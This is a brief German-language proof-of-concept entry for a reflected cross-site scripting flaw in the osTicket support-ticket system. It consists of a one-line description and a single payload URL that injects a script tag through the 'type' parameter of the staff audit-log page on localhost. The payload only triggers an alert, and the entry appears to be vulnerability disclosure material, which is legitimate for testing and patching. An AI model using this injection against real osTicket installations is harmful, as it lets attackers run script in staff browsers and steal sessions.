
Proof-of-Concept-Exploit für reflektiertes XSS im osTicket-Support-Ticket-System, der die Injektion über Audit-Log-Parameter demonstriert.
Reflektiertes XSS
http://localhost/scp/audits.php?startData=&endDate=&type="><script>alert('reflectedXSS')</script>